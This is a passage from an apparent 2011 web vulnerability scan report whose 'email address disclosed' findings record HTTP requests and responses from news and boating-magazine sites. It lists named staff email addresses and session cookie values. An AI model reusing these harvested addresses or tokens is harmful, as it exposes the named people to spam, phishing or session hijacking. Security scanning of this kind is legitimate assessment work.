<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.177. http://www.nydailynews.com/blogs/jets/2011/01/live-chat-friday-noon-1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nydailynews.com
Path:   /blogs/jets/2011/01/live-chat-friday-noon-1

Issue detail

The following email address was disclosed in the response:

Request

GET /blogs/jets/2011/01/live-chat-friday-noon-1 HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:10:48 GMT
Server: Apache
X-Drupal-Cache: MISS
Last-Modified: Fri, 28 Jan 2011 14:10:48 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1296223848"
Set-Cookie: SESS4b6fdd449e798eeea778eb52d9a68097=798638bea14b1d09568b917696e409a0; expires=Sun, 20-Feb-2011 17:44:09 GMT; path=/; domain=.nydailynews.com; HttpOnly
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Set-Cookie: NSC_wjq-cmpht-8080=4459351229a0;expires=Fri, 28-Jan-11 14:18:22 GMT;path=/
Content-Length: 95223

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="mailto:blogquery@nydailynews.com">blogquery@nydailynews.com</a>
...[SNIP]...

21.178. http://www.nydailynews.com/blogs/rangers/2011/01/live-chat-wednesday-at-2-pm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nydailynews.com
Path:   /blogs/rangers/2011/01/live-chat-wednesday-at-2-pm

Issue detail

The following email address was disclosed in the response:

Request

GET /blogs/rangers/2011/01/live-chat-wednesday-at-2-pm HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:10:49 GMT
Server: Apache
X-Drupal-Cache: MISS
Last-Modified: Fri, 28 Jan 2011 14:10:49 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1296223849"
Set-Cookie: SESS4b6fdd449e798eeea778eb52d9a68097=13e7f46734298e8a605b9431d8cfd80d; expires=Sun, 20-Feb-2011 17:44:09 GMT; path=/; domain=.nydailynews.com; HttpOnly
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Set-Cookie: NSC_wjq-cmpht-8080=4459351229a0;expires=Fri, 28-Jan-11 14:18:22 GMT;path=/
Content-Length: 102098

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="mailto:blogquery@nydailynews.com">blogquery@nydailynews.com</a>
...[SNIP]...

21.179. https://www.paperg.com/post.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.paperg.com
Path:   /post.php

Issue detail

The following email address was disclosed in the response:

Request

GET /post.php?bid=2123&pid=3922&post HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=7vd5ghvii8jml9e7v9p6kn1gt1;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:17:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
   <head>
       <title>PaperG | Post a Flyer</title>
       
       <meta http-equiv="Content-Type" co
...[SNIP]...
<span id="msg_email">&nbsp;ex. young@jtmarlin.com </span>
...[SNIP]...

21.180. http://www.soundingsonline.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /

Issue detail

The following email addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.181. http://www.soundingsonline.com/about-us

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /about-us

Issue detail

The following email addresses were disclosed in the response:

Request

GET /about-us HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:45 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.182. http://www.soundingsonline.com/advertise

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /advertise

Issue detail

The following email addresses were disclosed in the response:

Request

GET /advertise HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:13 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:tmarion@soundingspub.com">tmarion@soundingspub.com</a>
...[SNIP]...
<a href="mailto:f.lavigne@soundingspub.com">f.lavigne@soundingspub.com</a>
...[SNIP]...
<a href="mailto:ryanvincent@soundingspub.com">ryanvincent@soundingspub.com</a>
...[SNIP]...
<a href="mailto:wayne@soundingspub.com">wayne@soundingspub.com</a>
...[SNIP]...
<a href="mailto:amber@soundingspub.com">amber@soundingspub.com</a>
...[SNIP]...
<a href="mailto:w.connor@soundingspub.com">w.connor@soundingspub.com</a>
...[SNIP]...
<a href="mailto:m.boyles@soundingspub.com">m.boyles@soundingspub.com</a>
...[SNIP]...
<a href="mailto:c.francis@soundingspub.com">c.francis@soundingspub.com</a>
...[SNIP]...
<a href="mailto:amber@soundingspub.com">amber@soundingspub.com</a>
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.183. http://www.soundingsonline.com/archives

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /archives

Issue detail

The following email addresses were disclosed in the response:

Request

GET /archives HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:13 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.184. http://www.soundingsonline.com/boat-shop

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop

Issue detail

The following email addresses were disclosed in the response:

Request

GET /boat-shop HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:45 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.185. http://www.soundingsonline.com/boat-shop/know-how

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/know-how

Issue detail

The following email addresses were disclosed in the response:

Request

GET /boat-shop/know-how HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:42 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.186. http://www.soundingsonline.com/boat-shop/new-boats

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/new-boats

Issue detail

The following email addresses were disclosed in the response:

Request

GET /boat-shop/new-boats HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:46 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.187. http://www.soundingsonline.com/boat-shop/new-gear

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/new-gear

Issue detail

The following email addresses were disclosed in the response:

Request

GET /boat-shop/new-gear HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:55 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.188. http://www.soundingsonline.com/boat-shop/on-powerboats

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/on-powerboats

Issue detail

The following email addresses were disclosed in the response:

Request

GET /boat-shop/on-powerboats HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:48 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.189. http://www.soundingsonline.com/boat-shop/on-sailboats

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/on-sailboats

Issue detail

The following email addresses were disclosed in the response:

Request

GET /boat-shop/on-sailboats HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:48 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.190. http://www.soundingsonline.com/boat-shop/q-a-a

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/q-a-a

Issue detail

The following email addresses were disclosed in the response:

Request

GET /boat-shop/q-a-a HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:42 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.191. http://www.soundingsonline.com/boat-shop/sea-savvy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/sea-savvy

Issue detail

The following email addresses were disclosed in the response:

Request

GET /boat-shop/sea-savvy HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:40 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.192. http://www.soundingsonline.com/boat-shop/tech-talk

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/tech-talk

Issue detail

The following email addresses were disclosed in the response:

Request

GET /boat-shop/tech-talk HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:55 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.193. http://www.soundingsonline.com/boat-shop/used-boat-review

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/used-boat-review

Issue detail

The following email addresses were disclosed in the response:

Request

GET /boat-shop/used-boat-review HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:55 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.194. http://www.soundingsonline.com/calendar

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /calendar

Issue detail

The following email addresses were disclosed in the response:

Request

GET /calendar HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:37 GMT
